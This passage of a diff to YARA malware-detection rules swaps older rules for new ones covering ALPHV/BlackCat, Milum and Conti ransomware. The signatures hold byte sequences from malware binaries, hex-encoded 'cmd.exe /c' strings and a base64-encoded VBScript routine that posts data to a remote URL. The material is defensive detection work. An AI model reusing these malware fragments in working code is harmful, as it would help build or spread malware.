+		$s4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 63 }
+		$seq_Service = { 4c 8b dc 57 48 81 ec e0 02 00 00 48 c7 44 24 70 fe ff ff ff 49 89 5b 10 49 89 73 18 48 8b 05 65 12 0a 00 48 33 c4 48 89 84 24 d0 02 00 00 48 8b d9 48 89 4c 24 78 41 b8 04 01 00 00 49 8d 93 d8 fd ff ff 33 c9 ff 15 9d 20 07 00 85 c0 75 19 ff 15 33 21 07 00 8b d0 48 8d 0d 8a b6 08 00 e8 1d f7 ff ff e9 a5 01 00 00 33 f6 48 89 b4 24 90 00 00 00 48 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 d4 9f ff ff 66 39 b4 24 c0 00 00 00 75 05 44 8b c6 eb 1f 48 8d 84 24 c0 00 00 00 49 83 c8 ff 66 0f 1f 84 00 00 00 00 00 49 ff c0 66 42 39 34 40 75 f6 48 8d 94 24 c0 00 00 00 48 8d 8c 24 80 00 00 00 e8 41 05 00 00 90 4c 8b c3 48 8d 8c 24 a0 00 00 00 e8 60 0a 00 00 90 49 83 c9 ff 45 33 c0 48 8b d0 48 8d 8c 24 80 00 00 00 e8 a8 07 00 00 90 45 33 c0 b2 01 48 8d 8c 24 a0 00 00 00 e8 55 9f ff ff 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 d5 1e 07 00 48 8b f8 48 85 c0 75 19 ff 15 5f 20 07 00 8b d0 48 8d 0d de b5 08 00 e8 49 f6 ff ff e9 be 00 00 00 4c 8d 8c 24 80 00 00 00 48 83 bc 24 98 00 00 00 08 4c 0f 43 8c 24 80 00 00 00 48 8d 15 33 7a 0a 00 4c 8b c2 48 83 3d 40 7a 0a 00 08 4c 0f 43 05 20 7a 0a 00 48 0f 43 15 18 7a 0a 00 48 89 74 24 60 48 89 74 24 58 48 89 74 24 50 48 89 74 24 48 48 89 74 24 40 4c 89 4c 24 38 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 41 b9 ff 01 0f 00 48 8b c8 ff 15 23 1e 07 00 48 8b f0 48 85 c0 75 16 ff 15 bd 1f 07 00 8b d0 48 8d 0d 5c b5 08 00 e8 a7 f5 ff ff eb 15 48 8d 0d 6e b5 08 00 e8 99 f5 ff ff 48 8b ce ff 15 e0 1d 07 00 48 8b cf ff 15 d7 1d 07 00 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 54 9e ff ff 90 45 33 c0 b2 01 48 8b cb e8 46 9e ff ff 48 8b 8c 24 d0 02 00 00 48 33 cc e8 d6 94 02 00 4c 8d 9c 24 e0 02 00 00 49 8b 5b 18 49 8b 73 20 49 8b e3 5f }
+		$seq_ConnectC2 = { 33 c0 48 89 44 24 70 48 89 44 24 78 66 89 7c 24 70 8d 48 35 ff 15 2f 62 07 00 66 89 44 24 72 48 8b cb e8 ea dc ff ff 48 8b c8 ff 15 29 62 07 00 89 44 24 74 49 8b cd e8 d5 dc ff ff 48 8b d0 c7 44 24 28 10 00 00 00 48 8d 44 24 70 48 89 44 24 20 45 33 c9 45 8b 45 10 49 8b cc ff 15 e0 61 07 00 83 f8 ff 75 12 45 33 c0 48 8d 15 6b cb 08 00 48 8b ce e8 79 de ff ff 4c 89 a4 24 a8 00 00 00 c7 84 24 a0 00 00 00 01 00 00 00 48 c7 44 24 38 0a 00 00 00 41 8d 4c 24 01 48 8d 44 24 38 48 89 44 24 20 45 33 c9 45 33 c0 48 8d 94 24 a0 00 00 00 ff 15 aa 61 07 00 83 f8 01 0f 94 c0 84 c0 0f 84 0f 01 00 00 45 33 c9 41 b8 00 02 00 00 48 8d 94 24 b0 02 00 00 49 8b cc ff 15 72 61 07 00 4c 63 c0 85 c0 0f 8e ea 00 00 00 41 8b c8 49 8b d0 49 8b c0 45 85 c0 0f 8e d8 00 00 00 0f 1f 44 00 00 80 bc 04 b0 02 00 00 00 0f 85 b7 00 00 00 48 3b d0 0f 84 ae 00 00 00 85 c9 0f 84 b4 00 00 00 83 c1 03 41 3b c8 0f 8d a8 00 00 00 48 8d 9c 24 b0 02 00 00 48 03 da 48 63 c1 48 8d bc 24 b0 02 00 00 48 03 f8 4c 89 b4 24 90 00 00 00 4c 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 0a dd ff ff 48 3b fb 74 17 48 2b df 4c 8b c3 48 8b d7 48 8d 8c 24 80 00 00 00 e8 6f dd ff ff 90 48 8d 84 24 80 00 00 00 48 3b f0 74 18 49 83 c9 ff 45 33 c0 48 8d 94 24 80 00 00 00 48 8b ce e8 2a de ff ff 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 b7 dc ff ff 48 8b 5c 24 48 bf }
+		$seq_RegisterEvent = { 40 53 48 83 ec 20 48 83 3d 5a 79 0a 00 08 48 8d 1d 3b 79 0a 00 48 8b cb 48 8d 15 91 01 00 00 48 0f 43 0d 29 79 0a 00 ff 15 93 1d 07 00 48 89 05 44 77 0a 00 48 8b c8 48 85 c0 75 2d 48 83 3d 24 79 0a 00 08 48 0f 43 1d 04 79 0a 00 48 8b d3 ff 15 7b 1d 07 00 48 85 c0 74 62 48 8b c8 ff 15 35 1d 07 00 48 83 c4 20 5b c3 33 c0 c7 05 db 76 0a 00 10 00 00 00 48 89 05 e0 76 0a 00 48 8d 15 cd 76 0a 00 8b 05 17 1c 0a 00 89 05 d5 76 0a 00 ff c0 89 05 09 1c 0a 00 48 c7 05 b2 76 0a 00 02 00 00 00 c7 05 bc 76 0a 00 b8 0b 00 00 ff 15 06 1d 07 00 48 83 c4 20 5b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "565005404f00b7def4499142ade5e3dd" or 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of ( $s* ) and 2 of ( $seq* )
 }
-
-rule ARKBIRD_SOLG_APT28_Zekapab_June_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_ALPHV_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect Delphi variant of Zekapab"
+		description = "Detect AlphV ransomware (Nov and Dec 2021)"
 		author = "Arkbird_SOLG"
-		id = "cf87e67f-2db9-537d-8800-8cd47b47c276"
-		date = "2020-06-28"
-		modified = "2020-06-28"
-		reference = "https://twitter.com/DrunkBinary/status/1276573779037163520"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT28_Zekapab_June_2020_1.yar#L3-L29"
+		id = "5c758dc9-b1dc-58e0-b443-6f78e27ffefe"
+		date = "2021-12-09"
+		modified = "2021-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-09/RAN_ALPHV_Dec_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "a02a78b8f60cf9d4441cc18b70fd00ec89253a5feafdc0eb392486b575bc61e2"
+		logic_hash = "416ebea98f660dd9fad27c3be0c79e47bc69e08fe4be7db76a71462d2c5ada49"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-		hash1 = "12879b9d8ae046ca2f2ebcc7b1948afc44e6e654b7f4746e7a5243267cfd7c46"
+		hash1 = "3d7cf20ca6476e14e0a026f9bdd8ff1f26995cdc5854c3adb41a6135ef11ba83"
+		hash2 = "7e363b5f1ba373782261713fa99e8bbc35ddda97e48799c4eb28f17989da8d8e"
+		hash3 = "cefea76dfdbb48cfe1a3db2c8df34e898e29bec9b2c13e79ef40655c637833ae"
+		hash4 = "731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161"
+		tlp = "white"
+		adversary = "BlackCat"
 
 	strings:
-		$s1 = "54484520494E535452554354494F4E2041542030783763663538326164205245464552454E434544204D454D4F525920415420307830303030303030302E2054" ascii
-		$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
-		$s3 = "5C4164646974696F6E735C73616D636C69656E742E657865" ascii
-		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
-		$s5 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" fullword ascii
-		$s6 = "Software\\Borland\\Delphi\\Locales" fullword ascii
-		$s7 = "SOFTWARE\\Borland\\Delphi\\RTL" fullword ascii
-		$s8 = "Software\\Borland\\Locales" fullword ascii
-		$s9 = "FastMM Borland Edition" fullword ascii
-		$s10 = "#7@Qhq\\1@NWgyxeH\\_bpdgc" fullword ascii
-		$s11 = "4150504C49434154494F4E204552524F52" ascii
-		$s12 = "436D442E457865202F6320" ascii
-		$s13 = "6572726F72" ascii
-		$s14 = "WndProcPtr" fullword ascii
-		$s15 = "Request.UserAgent" fullword ascii
-		$s16 = "ProxyPassword<" fullword ascii
+		$s1 = { ff b4 24 [2] 00 00 6a 00 ff 35 ?? e1 ?? 00 e8 [3] 00 8d 8c 24 [2] 00 00 ba [3] 00 68 c0 1f 00 00 e8 [3] ff 83 c4 04 ?? bc 24 [2] 00 00 }
+		$s2 = { 85 f6 74 47 8b 3d ?? e1 ?? 00 85 ff 0f 85 81 00 00 00 eb 60 68 [3] 00 6a 00 6a 00 e8 [2] 04 00 85 c0 0f 84 99 01 00 00 89 c1 31 c0 f0 0f b1 0d ?? e1 ?? 00 0f 84 f0 fe ff ff 89 c6 51 e8 [2] 04 00 89 f1 e9 e1 fe ff ff 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 32 03 00 00 89 c6 a3 ?? e1 ?? 00 8b 3d ?? e1 ?? 00 85 ff 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 09 03 00 00 89 c7 a3 ?? e1 ?? 00 89 74 24 18 e8 [2] 04 00 8b 35 ?? e1 ?? 00 89 44 24 14 85 f6 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 b8 01 00 00 89 c6 a3 ?? e1 ?? 00 8d 44 24 70 c7 44 24 64 00 00 00 00 c7 44 24 60 00 00 00 00 68 0c 01 00 00 6a 00 50 e8 [2] 04 00 83 }
+		$s3 = { 8b 38 89 4d ec 89 55 ?? 74 34 a1 ?? e1 ?? 00 85 c0 75 0e e8 [3] 00 85 c0 74 14 a3 ?? e1 ?? 00 53 6a 00 50 e8 [3] 00 89 c6 85 c0 75 13 89 d9 ba 01 00 00 00 e8 [3] ff 0f 0b be 01 00 00 00 53 57 56 e8 [3] 00 83 c4 0c 8d 04 1e 8d 4d }
+		$s4 = { 83 c4 0c c7 45 ?? 00 00 00 00 c7 45 ?? 02 00 00 89 89 75 ?? 8d 45 ?? c7 45 ?? 00 00 00 00 c7 45 ?? 00 00 00 00 6a 10 50 57 e8 [3] 00 83 f8 ff 0f 84 ?? 02 00 00 f6 45 9c ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "dbdfe8b60c1de0a9201044b3e91b9502" or 12 of them )
+		uint16( 0 ) == 0x5A4D and filesize > 300KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_Loa_JS_Gootkit_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Milum_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect JS loader used on the Gootkit killchain (November 2020)"
+		description = "Detect Milum malware"
 		author = "Arkbird_SOLG"
-		id = "649133bd-a44c-5d99-befa-0508fed27ed8"
-		date = "2020-11-21"
-		modified = "2020-11-21"
-		reference = "https://twitter.com/ffforward/status/1330214661577437187"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Gootkit/Loa_JS_Gootkit_Nov_2020_1.yar#L1-L16"
+		id = "ba1cc56e-f6da-57db-a773-4823ae343e31"
+		date = "2021-07-08"
+		modified = "2021-07-08"
+		reference = "https://securelist.com/wildpressure-targets-macos/103072/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-08/WildPressure/MAL_Milum_Jul_2021_1.yara#L1-L33"
 		license_url = "N/A"
-		logic_hash = "f24d31e7107b8c59b969481596a5e1369933bf2b0fa5117cd1aa5f7ea116d8d5"
+		logic_hash = "4321051fdc9ab5f4ee12c4b505e4271df89b489067875eaf3d2cb670815f7e37"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "7aec3ed791529182c0f64ce34415c3c705a79f3d628cbcff70c34a9f73d8ff42"
+		hash1 = "7eafb957c2e715e06489a979a185f75d7a9d502223c8aba36e7b6b8ead7d03b2"
+		hash2 = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9"
+		hash3 = "5e0226f37b861876ec38e4a1564a26e4af3022d869375bc0f09b8feea4cd9e1b"
+		tlp = "White"
+		adversary = "WildPressure"
 
 	strings:
-		$s1 = { 7b [4-6] 5b [4-6] 5d 28 [4-6] 5b [4-6] 5d 29 28 [4-6] 5b [4-6] 5d 29 3b 7d }
-		$s2 = { 7b 72 65 74 75 72 6e 20 [4-6] 20 25 20 28 [4-6] 2b [4-6] 29 3b 7d }
-		$s3 = { 7b [4-6] 20 3d 20 [4-6] 28 [4-6] 29 2e 73 70 6c 69 74 28 [4-6] 29 3b 7d }
-		$s4 = { 7b 72 65 74 75 72 6e 20 [4-6] 2e 63 68 61 72 41 74 28 [4-6] 29 3b 7d}
-		$s5 = { 7b [4-6] 5b [4-6] 5d 20 3d 20 [4-6] 5b [4-6] 5b [4-6] 5d 5d 3b 7d }
+		$s1 = { 52 00 4f 00 4f 00 54 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 00 65 00 6c 00 65 00 63 00 74 00 20 [3-7] 20 00 46 00 72 00 6f 00 6d 00 20 00 41 00 6e 00 74 00 69 00 56 00 69 00 72 00 75 00 73 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 20 00 57 00 48 00 45 00 52 00 45 00 20 00 64 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 20 00 3c 00 3e 00 27 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 44 00 65 00 66 00 65 00 6e 00 64 00 65 00 72 00 27 }
+		$s2 = "c1VybCA9IHt1fQ0Kc1JlcXVlc3QgPSB7cH0NCkhUVFBQb3N0IHNVcmwsIHNSZXF1ZXN0DQpGdW5jdGlvbiBIVFRQUG9zdChzVXJsLCBzUmVxdWVzdCkNCiAgc2V0IG9IVFRQID0gQ3JlYXRlT2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpDQogIG9IVFRQLm9wZW4gIlBPU1QiLCBzVXJsLGZhbHNlDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZXF1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogIFdzY3JpcHQuRWNobyBvSFRUUC5yZXNwb25zZVRleHQNCiAgSFRUUFBvc3QgPSBvSFRUUC5yZXNwb25zZVRleHQNCiBFbmQgRnVuY3Rpb24=" fullword ascii
+		$s3 = { 46 49 4c 45 20 48 41 4e 44 45 4c 20 4e 4f 54 20 46 4f 55 4e 44 00 00 00 4e 4f 20 44 61 74 61 00 }
+		$s4 = { 28 00 77 00 73 00 33 00 32 00 29 00 65 00 79 00 4a 00 73 00 62 00 32 00 35 00 6e 00 64 00 32 00 46 00 70 00 64 00 43 00 49 00 36 00 49 00 6a 00 }
+		$s5 = { 55 8b ec 6a ff 68 [3] 00 64 a1 00 00 00 00 50 83 ec 24 a1 [3] 00 33 c5 89 45 f0 ?? 57 50 8d 45 f4 64 a3 00 00 00 00 [8] b9 0f 00 00 00 89 4e }
+		$s6 = { 20 2f 63 20 [0-1] 46 4f 52 20 2f 6c 20 25 69 20 69 6e 20 28 31 2c 31 2c [1-4] 29 20 44 4f 20 49 46 20 4e 4f 54 20 45 58 49 53 54 20 22 00 22 29 }
+		$s7 = { 83 c4 0c 8d 95 44 fe ff ff 52 c7 85 44 fe ff ff 14 01 00 00 ff 15 [3] 00 83 bd 48 fe ff ff 06 7d 17 bf [3] 00 89 bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 eb 1a c7 85 ?? fe ff ff [3] 00 8b bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 }
+		$s8 = { 8b 45 08 50 68 bc 78 45 00 68 d0 78 45 00 8d 8d d0 fc ff ff 51 ff d6 83 c4 10 8b 3d a0 e0 44 00 8b 35 c4 e0 44 00 8d 64 }
 
 	condition:
-		filesize > 1KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Mount_Locker_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_Conti_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect Mount Locker ransomware (November 2020 variant)"
+		description = "Detect Conti ransomware (v3)"
 		author = "Arkbird_SOLG"
-		id = "20fde6f4-ef7d-57c4-8cc2-a6ea810c2b0c"
-		date = "2020-11-20"
-		modified = "2020-11-22"
+		id = "efa65b86-95d7-55fd-b98a-7b3c747a671c"
+		date = "2021-12-16"
+		modified = "2021-12-16"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Mount Locker/Ran_Mount_Locker_Nov_2020_1.yar#L1-L26"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/RAN_Conti_Dec_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "028e89e9c0c46ac5c36fee5cbfba068b4c6c1f53aa224e454ebd358f2c6ae9a9"
+		logic_hash = "038ad0c7ffcabcaf85de1adadf8a386063f96d5cd0e348a3cea4ea3b7b10fe70"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037"
-		hash2 = "226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2"
+		hash1 = "a05c8129e607c6d0976d79f69c6a020d15767a9ef3a9c9f1570c5193a7b5b76b"
+		hash2 = "3125aa67fc6e09a00aad39e0eb8024b849d54de353b1a45b5297d4c5d5e87941"
+		hash3 = "03597628e999d791f4cc442328024235db9a929467a62ef0a00c91a76161f0e1"
+		tlp = "white"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword wide
-		$s2 = "VBA6.DLL" fullword ascii
-		$s3 = "MSComDlg.CommonDialog" fullword ascii
-		$s4 = "DllFunctionCall" fullword ascii
-		$s5 = { 00 2a 00 5c 00 41 00 43 00 3a 00 5c [35-160] 00 2e 00 76 00 62 00 70 }
-		$s6 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\COMCTL32.oca" fullword wide
-		$s7 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\MSFLXGRD.oca" fullword ascii
-		$s8 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
-		$s9 = "SFLXGRD.OCX" fullword ascii
-		$s10 = "COMDLG32.OCX" fullword ascii
-		$s11 = "COMCTL32.OCX" fullword ascii
-		$seq1 = { 42 00 24 00 40 00 43 00 67 00 2f 00 44 00 08 00 4a 00 51 00 77 00 54 00 76 00 25 00 55 00 48 00 00 00 00 00 5d 00 4c 00 09 00 53 00 3e 00 73 00 62 00 52 00 50 00 0b 00 61 00 01 00 61 01 3a 00 03 00 57 00 4f 00 75 00 54 00 71 00 22 00 53 00 37 00 00 00 30 00 1d 00 46 00 5a 00 5c 00 48 00 78 00 63 00 02 00 1d 00 23 00 3b 00 28 00 55 00 73 00 28 00 61 00 3b 00 00 00 00 00 44 00 4e 00 4a 00 4d 00 61 00 40 00 59 00 2b 00 38 00 02 01 04 01 54 00 08 00 52 00 56 00 1d 00 42 00 3e 00 00 00 00 00 35 00 70 00 3b 00 37 00 6f 00 26 00 26 00 40 00 64 00 02 00 51 00 3c 00 41 00 16 00 3e 00 00 00 47 00 58 00 33 00 89 00 54 00 2d 00 29 00 50 00 04 00 59 00 5d 00 4f 00 1b 00 36 00 30 00 83 00 41 00 00 00 2a 00 54 00 47 00 86 00 56 00 19 00 24 00 4e 00 3a 00 45 00 51 00 4d 00 1e 00 3b 00 2b 00 81 00 35 00 00 00 3a 00 65 00 57 00 03 00 2d 00 62 00 53 }
-		$seq2 = { 5a 00 3d 00 14 00 51 00 1f 00 67 00 1c 00 24 00 00 00 00 00 00 00 6f 00 27 00 62 00 5d 00 6d 00 30 00 01 00 27 01 25 00 62 00 7b 00 05 00 56 00 24 00 3c 00 3d 00 5d 00 2e 00 62 00 03 00 0a 00 57 00 6a 00 02 00 5d 00 02 01 23 01 67 00 20 00 54 00 01 00 6c 01 17 00 0b 00 44 00 21 00 1e 00 01 00 52 01 60 00 3b 00 11 00 45 00 2a 00 59 00 2c 00 19 00 00 00 5a 00 1e 00 61 00 5c 00 6b 00 31 00 01 00 1a 01 2d 00 4a 00 6f 00 11 00 57 00 2c 00 3a 00 3a 00 50 00 2a 00 61 00 02 00 07 00 53 00 7b 00 01 01 5b 00 02 01 6a 01 0b 00 03 00 6d 00 43 00 0c 00 64 00 4d 00 44 00 5f 00 08 00 5a 00 68 00 2b 00 32 00 68 }
+		$s1 = { 81 ec 78 0b 00 00 c6 45 c4 00 c6 45 c5 48 c6 45 c6 45 c6 45 c7 64 c6 45 c8 45 c6 45 c9 46 c6 45 ca 45 c6 45 cb 46 c6 45 cc 45 53 c6 45 cd 45 bb 7f 00 00 00 c6 45 ce 45 8a 45 c5 80 7d c4 00 56 57 8b f9 75 2c 33 f6 66 0f 1f 44 00 00 8a 44 35 c5 b9 45 00 00 00 0f b6 c0 2b c8 6b c1 1b 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 c5 46 83 fe 0a 72 dc 8d 45 c5 89 85 88 f4 ff ff c6 45 b8 00 c6 45 b9 65 c6 45 ba 32 c6 45 bb 45 c6 45 bc 32 c6 45 bd 43 c6 45 be 32 c6 45 bf 6d c6 45 c0 32 c6 45 c1 32 c6 45 c2 32 8a 45 b9 80 7d b8 00 75 29 33 f6 8a 44 35 b9 b9 32 00 00 00 0f b6 c0 2b c8 8d 04 49 c1 e0 03 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 b9 46 83 fe 0a 72 d9 8d 45 b9 89 85 8c f4 ff ff 8d 8d 34 f7 ff ff c6 85 34 f7 ff ff 00 c6 85 35 f7 ff ff 6d c6 85 36 f7 ff ff 11 c6 85 37 f7 ff ff 54 c6 85 38 f7 ff ff 11 c6 85 39 f7 ff ff 58 c6 85 3a f7 ff ff 11 c6 85 3b f7 ff ff 58 c6 85 3c f7 ff ff 11 c6 85 3d f7 ff ff 5a c6 85 3e f7 ff ff 11 c6 85 3f f7 ff ff 56 c6 85 40 f7 ff ff 11 c6 85 41 f7 ff ff 11 c6 85 42 f7 ff ff 11 8a 85 35 f7 ff ff e8 e2 a2 00 00 89 85 90 f4 ff ff c6 85 c4 f8 ff ff 00 c6 85 c5 f8 ff ff 18 c6 85 c6 f8 ff ff 0c c6 85 c7 f8 ff ff 57 c6 85 c8 f8 ff ff 0c c6 85 c9 f8 ff ff 52 c6 85 ca f8 ff ff 0c c6 85 cb f8 ff ff 52 c6 85 cc f8 ff ff 0c c6 85 cd f8 ff ff 10 c6 85 ce f8 ff ff 0c c6 85 cf f8 ff ff 52 c6 85 d0 f8 ff ff 0c c6 85 d1 f8 ff ff 0c c6 85 d2 f8 ff ff 0c 8a 85 c5 f8 ff ff 80 bd c4 f8 ff ff 00 75 2a 33 c9 66 90 8a 84 0d c5 f8 ff ff 0f b6 c0 83 e8 0c 6b c0 19 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d c5 f8 ff ff 41 83 f9 0e 72 da 8d 85 c5 f8 ff ff 89 85 94 f4 ff ff c6 85 04 f9 ff ff 00 c6 85 05 f9 ff ff 74 c6 85 06 f9 ff ff 4d c6 85 07 f9 ff ff 23 c6 85 08 f9 ff ff 4d c6 85 09 f9 ff ff 72 c6 85 0a f9 ff ff 4d c6 85 0b f9 ff ff 72 c6 85 0c f9 ff ff 4d c6 85 0d f9 ff ff 5a c6 85 0e f9 ff ff 4d c6 85 0f f9 ff ff 42 c6 85 10 f9 ff ff 4d c6 85 11 f9 ff ff 4d c6 85 12 f9 ff ff 4d 8a 85 05 f9 ff ff 80 bd 04 f9 ff ff 00 75 2c 33 c9 0f 1f 40 00 8a 84 0d 05 f9 ff ff 0f b6 c0 83 e8 4d 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d 05 f9 ff ff 41 83 f9 0e 72 da 8d 85 05 f9 ff ff 89 85 98 f4 ff ff c6 85 f4 f8 ff ff 00 c6 85 f5 f8 ff ff 46 c6 85 f6 f8 ff ff 02 c6 85 f7 f8 ff ff 2e c6 85 f8 f8 ff ff 02 c6 85 f9 f8 ff ff 3c c6 85 fa f8 ff ff 02 c6 85 fb f8 ff ff 3c c6 85 fc f8 ff ff 02 c6 85 fd f8 ff ff 43 c6 85 fe f8 ff ff 02 c6 85 }
+		$s2 = { c7 85 b8 f7 ff ff 00 00 00 00 8d 8d 60 f7 ff ff c6 85 60 f7 ff ff 00 c6 85 61 f7 ff ff 36 c6 85 62 f7 ff ff 7a c6 85 63 f7 ff ff 29 c6 85 64 f7 ff ff 7a c6 85 65 f7 ff ff 29 c6 85 66 f7 ff ff 7a c6 85 67 f7 ff ff 69 c6 85 68 f7 ff ff 7a c6 85 69 f7 ff ff 37 c6 85 6a f7 ff ff 7a c6 85 6b f7 ff ff 74 c6 85 6c f7 ff ff 7a c6 85 6d f7 ff ff 0f c6 85 6e f7 ff ff 7a c6 85 6f f7 ff ff 75 c6 85 70 f7 ff ff 7a c6 85 71 f7 ff ff 1d c6 85 72 f7 ff ff 7a c6 85 73 f7 ff ff 00 c6 85 74 f7 ff ff 7a c6 85 75 f7 ff ff 7a c6 85 76 f7 ff ff 7a 8a 85 61 f7 ff ff e8 e7 bb 00 00 6a 07 68 8f cf af 70 ba 19 00 00 00 8b f0 e8 04 db ff ff 83 c4 08 56 ff d0 8b 8d b4 f7 ff ff 8d b5 b8 f7 ff ff 56 ff b5 a8 f7 ff ff 8b 11 6a 00 6a 00 6a 00 6a 00 6a 00 50 51 ff 52 0c 8b f0 c7 85 8c f7 ff ff d6 00 6a 00 8b 85 8c f7 ff ff 99 f7 fb 85 d2 74 50 8b 8d 8c f7 ff ff 8b 85 b8 f7 ff ff 83 c0 02 03 c1 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 05 48 83 c8 fc 40 0f 85 50 01 00 00 66 90 ff 85 8c f7 ff }
+		$s3 = { 75 f5 88 8d 50 f6 ff ff c6 85 51 f6 ff ff 48 c6 85 52 f6 ff ff 20 c6 85 53 f6 ff ff 5e c6 85 54 f6 ff ff 20 c6 85 55 f6 ff ff 7d c6 85 56 f6 ff ff 20 c6 85 57 f6 ff ff 39 c6 85 58 f6 ff ff 20 c6 85 59 f6 ff ff 33 c6 85 5a f6 ff ff 20 c6 85 5b f6 ff ff 2a c6 85 5c f6 ff ff 20 c6 85 5d f6 ff ff 33 c6 85 5e f6 ff ff 20 c6 85 5f f6 ff ff 4d c6 85 60 f6 ff ff 20 c6 85 61 f6 ff ff 6e c6 85 62 f6 ff ff 20 c6 85 63 f6 ff ff 48 c6 85 64 f6 ff ff 20 c6 85 65 f6 ff ff 4d c6 85 66 f6 ff ff 20 c6 85 67 f6 ff ff 1b c6 85 68 f6 ff ff 20 c6 85 69 f6 ff ff 3a c6 85 6a f6 ff ff 20 c6 85 6b f6 ff ff 52 c6 85 6c f6 ff ff 20 c6 85 6d f6 ff ff 47 c6 85 6e f6 ff ff 20 c6 85 6f f6 ff ff 09 c6 85 70 f6 ff ff 20 c6 85 71 f6 ff ff 14 c6 85 72 f6 ff ff 20 c6 85 73 f6 ff ff 7d c6 85 74 f6 ff ff 20 c6 85 75 f6 ff ff 49 c6 85 76 f6 ff ff 20 c6 85 77 f6 ff ff 74 c6 85 78 f6 ff ff 20 c6 85 79 f6 ff ff 1f c6 85 7a f6 ff ff 20 c6 85 7b f6 ff ff 52 c6 85 7c f6 ff ff 20 c6 85 7d f6 ff ff 71 c6 85 7e f6 ff ff 20 c6 85 7f f6 ff ff 5f c6 85 80 f6 ff ff 20 c6 85 81 f6 ff ff 1f c6 85 82 f6 ff ff 20 c6 85 83 f6 ff ff 54 c6 85 84 f6 ff ff 20 c6 85 85 f6 ff ff 33 c6 85 86 f6 ff ff 20 c6 85 87 f6 ff ff 5e c6 85 88 f6 ff ff 20 c6 85 89 f6 ff ff 44 c6 85 8a f6 ff ff 20 c6 85 8b f6 ff ff 0f c6 85 8c f6 ff ff 20 c6 85 8d f6 ff ff 52 c6 85 8e f6 ff ff 20 c6 85 8f f6 ff ff 74 c6 85 90 f6 ff ff 